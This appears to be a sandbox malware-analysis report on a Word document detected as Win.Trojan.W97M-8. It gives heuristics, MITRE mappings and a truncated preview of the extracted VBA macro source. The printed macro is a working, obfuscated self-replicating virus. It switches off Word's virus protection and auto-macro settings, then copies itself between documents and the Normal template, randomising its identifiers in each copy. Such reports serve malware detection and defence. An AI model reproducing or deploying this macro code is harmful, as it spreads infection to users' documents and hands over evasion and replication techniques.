MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV with the signature Win.Trojan.W97M-8. It contains VBA macros, specifically a Document_Open macro, which is a common technique for executing malicious code when the document is opened. The macro attempts to disable virus protection and auto-macros, suggesting an intent to evade detection and ensure execution of its payload.
Heuristics 3
-
ClamAV: Win.Trojan.W97M-8 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.W97M-8
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 29569 bytes |
SHA-256: 819d6645445078a8dc2e9910b451960af5710dc7ea3a527dda67ff482f1d19a5 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() ¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢……ƨåڥâԺœï = "´˜Ä¶ŸÂõ§ö¢ïç" ß×ù•´ºê‚ = ActiveDocument.VBProject.VBComponents(1).CodeModule.countoflines ™•µŒð�ÑâˆâàÝ÷ß = NormalTemplate.VBProject.VBComponents(1).CodeModule.countoflines Application.Options.VirusProtection = False Application.EnableCancelKey = wdCancelDisabled WordBasic.DisableAutoMacros 0 Options.SaveNormalPrompt = False If ß×ù•´ºê‚ > 169 And ™•µŒð�ÑâˆâàÝ÷ß > 169 Then Exit Sub If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = ActiveDocument Set ‡Óµ½’ùé„�� = NormalTemplate GoTo •ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å End If If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then Set �‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó = NormalTemplate Set ‡Óµ½’ùé„�� = ActiveDocument End If ReDim ƒê¶—Ð(50, 50) ¸£ƒ‡ÅÍ×Äè×ŽÌ = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines ß×ù•´ºê‚ = 0 Do Until ß×ù•´ºê‚ = ¸£ƒ‡ÅÍ×Äè×ŽÌ ß×ù•´ºê‚ = ß×ù•´ºê‚ + 1 ä�Ã÷�Ð÷Ô = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(ß×ù•´ºê‚, 1) If Left(ä�Ã÷�Ð÷Ô, 1) = "'" Then ßùŽ äÙ‡áÕÄÅò = Len(ä�Ã÷�Ð÷Ô) ä�Ã÷�Ð÷Ô = Mid(ä�Ã÷�Ð÷Ô, 2, ßùŽ äÙ‡áÕÄÅò) Ü = "" Ê®· = Len(ä�Ã÷�Ð÷Ô) Randomize Timer Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´²: êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1 For ݈ä �¿…ìÔ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£ '™•µŒð�ÑâˆâàÝ÷ß '�‰¬�¨¢Ë†ÂßÀ¦Œî¾�Ó“›èŪ»ôæ�éó '‡Óµ½’ùé„�� 'Ò¶Ž¸šÌ¹×ô©œ–œð 'øŠòÓù ½œ '³‘êîˆÈ�óøÎοÍï 'ÎÁ�à䢘¤ºøœÊÜÛ 'ß×ù•´ºê‚ 'Š '™Ìòç¿ð×—¤ 'ì »ï½–Ð¹à·í¡Œà˜‘‡ß 'ßùŽ äÙ‡áÕÄÅò 'ó•¨èÀ‚±™ÙÓ‰Ãæ•¶Æá 'ž÷� 'Æï£¯ÎàºÇÎŒ£ˆä˜´õ—ííÈÕЈ² 'Ò–À½¡ÑµÎŠÐØ�‡£®×ÂŽ½Éס´² 'ìܷǪ¼�œÃ‰Ö�¤ÎŒ�¼¥„û÷ð” 'Ìõ· 'Ü¿ŠÏ‘Ô´˜ð 'Ê®· 'ä�Ã÷�Ð÷Ô 'Æî¨µŒ ƒ¥Ï§ÚÊ®ÆùÊ”ôÄá™°ÄñÄŠ '׆ò玱éç¾´·³ŸËä¹õ¿Ð‹�ˆ°¹šÛ '°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ 'Ü¿ŠÏ‘Ô´˜ð 'ßùŽ äÙ‡áÕÄÅò 'Š '§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ '³‘êîˆÈ�óøÎοÍï '¸£ƒ‡ÅÍ×Äè×ŽÌ 'Úé÷Éï²»ú¢§ö�‡Ú̉ '݈ä �¿…ìÔ '™Ìòç¿ð×—¤ '�å΄�¯´Îñ�•¸˜ 'àïü†¸ '稜»Ö¦Ýð 'ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� 'õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š ' Ü '‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ 'êµ—èùÙ×ß¹Èö¶ˆ£ '݈ä �¿…ìÔ 'ƒê¶—Ð 'À½ 'ß×ù•´ºê‚ '°Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ 'ò‹ŸÍž¼ÎÄ̤² '•ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å '¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢…… õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š: ò‹ŸÍž¼ÎÄ̤² = CInt(Rnd * 250) + 1 If ò‹ŸÍž¼ÎÄ̤² = 13 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š If ò‹ŸÍž¼ÎÄ̤² < 65 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š If ò‹ŸÍž¼ÎÄ̤² < 130 Then GoTo õÄÈÎáÞÏäÖò¼ºŒìÙÚáç¶Ñí–š Ü = Ü & Chr(ò‹ŸÍž¼ÎÄ̤²) Next ݈ä �¿…ìÔ ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� = ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»� + 1 ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 1) = ä�Ã÷�Ð÷Ô ƒê¶—Ð(ª£¨§©ôä«šÊøæû±™ð×ïÉŒû£»�, 2) = Ü End If Loop •ŠÊ¨Ä ÖÌÓÙ£¡µˆÁÀÒé§’ë ±å: ß×ù•´ºê‚ = 1 §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = "Private Sub Document_Open()" & Chr(13) If ™•µŒð�ÑâˆâàÝ÷ß < 170 Then êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 30) + 1 For ݈ä �¿…ìÔ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£ �å΄�¯´Îñ�•¸˜: Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250) If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo �å΄�¯´Îñ�•¸˜ If Ü¿ŠÏ‘Ô´˜ð < 65 Then GoTo �å΄�¯´Îñ�•¸˜ If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo �å΄�¯´Îñ�•¸˜ Ü = Ü & Chr(Ü¿ŠÏ‘Ô´˜ð) Next ݈ä �¿…ìÔ êµ—èùÙ×ß¹Èö¶ˆ£ = CInt(Rnd * 20) For ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ = 1 To êµ—èùÙ×ß¹Èö¶ˆ£ àïü†¸: Ü¿ŠÏ‘Ô´˜ð = CInt(Rnd * 250) If Ü¿ŠÏ‘Ô´˜ð = 13 Then GoTo àïü†¸ If Ü¿ŠÏ‘Ô´˜ð = 34 Then GoTo àïü†¸ If Ü¿ŠÏ‘Ô´˜ð < 130 Then GoTo àïü†¸ °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ = °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(Ü¿ŠÏ‘Ô´˜ð) Next ‘•£™È“ᥲøÔ¨Ù‹§ç®í鄥䫒ÈÏ §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & Ü & "=" & Chr(34) & °Ó²³¨—³�Žß�ÆÍž÷ûÈÇ‘ & Chr(34) & Chr(13) End If ßùŽ äÙ‡áÕÄÅò = ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.countoflines For Š = 2 To ßùŽ äÙ‡áÕÄÅò §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ = §Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜ & ‡Óµ½’ùé„��.VBProject.VBComponents(1).CodeModule.Lines(Š, 1) & Chr(13) Next Š If ™•µŒð�ÑâˆâàÝ÷ß > 169 Then GoTo ¤õ´‰ÁíîÛ“¼‘Ìàì…ôôß…ß©«¾¢¢ˆÑ¢…… Do ³‘êîˆÈ�óøÎοÍï = 0 ¸£ƒ‡ÅÍ×Äè×ŽÌ = Len(§Ÿ§¼àöà™ææ�é–¹¡’¿ó´¶Éﱸœ“˜) À½ = À½ + 1 If ƒê¶—Ð(À½, 1) = ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.